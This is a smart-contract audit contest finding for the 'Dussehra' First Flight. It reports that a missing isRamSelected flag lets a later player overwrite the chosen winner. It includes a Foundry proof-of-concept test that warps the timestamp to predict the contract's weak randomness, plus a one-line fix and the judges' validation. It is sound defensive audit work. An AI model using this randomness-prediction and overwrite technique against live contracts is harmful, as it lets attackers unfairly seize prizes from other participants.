First Flight #17: Dussehra

First Flight #17

Beginner FriendlyFoundryNFT

100 EXP

View results

Previous Next

Submission Details

Severity: high

Valid

winner can be overwritten by another winner

Mahith

Summary

Once ram is selected, no one should be able to change ram again. If it can be changed then game becomes unfair and people loses trust in the protocol thereby results in failure of protocol.

Vulnerability Details

Paste below code in Dussehra.t.sol and run forge test --mt test__RamCanBeChangedAfterSelection

function test__RamCanBeChangedAfterSelection() public participants {

vm.warp(1728691196); // executing the transaction exactly at a particular timestamp to get a predictable outcome of 0 for simplicity

uint256 random = uint256(keccak256(abi.encodePacked(block.timestamp, block.prevrandao, msg.sender))) % 2;

assertEq(random, 0);

assertEq(ramNFT.getCharacteristics(random).ram, player1);

vm.startPrank(player1);

for (uint64 i = 0; i < 5; i++) {

choosingRam.increaseValuesOfParticipants(0, 1); // lets assume player 1 is selected as ram

}

vm.stopPrank();

assertEq(choosingRam.selectedRam(), player1); // selected ram is player 1

vm.warp(1728691197);

vm.startPrank(player2);

for (uint64 i = 0; i < 5; i++) {

choosingRam.increaseValuesOfParticipants(1, 0); // player2 is tring at different tiime to overwrite player 1

}

vm.stopPrank();

assertEq(choosingRam.selectedRam(), player2); // now, selected ram is not player 1 instead it player 2, so next player can overwrite initial winner

}

Impact

ram once selected shouldn't be changed later, to maintain transparency.

Tools Used

Foundry

Recommendations

Make below code change in ChoosingRam::increaseValuesOfParticipants

function increaseValuesOfParticipants(uint256 tokenIdOfChallenger, uint256 tokenIdOfAnyPerticipent)

public

RamIsNotSelected{

...

if(random == 0){

}

else if (ramNFT.getCharacteristics(tokenIdOfChallenger).isSatyavaakyah == false) {

ramNFT.updateCharacteristics(tokenIdOfChallenger, true, true, true, true, true);

selectedRam = ramNFT.getCharacteristics(tokenIdOfChallenger).ram;

+ isRamSelected = true;

}

Updates

Lead Judging Commences

bube Lead Judge over 1 year ago

Submission Judgement Published

Validated

Assigned finding tags:

`isRamSelected` is not set

Rewards breakdown

nSLOC

218

This contest has a flat reward structure with the following payouts:

High

100 EXP

Medium

20 EXP

Low

2 EXP

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.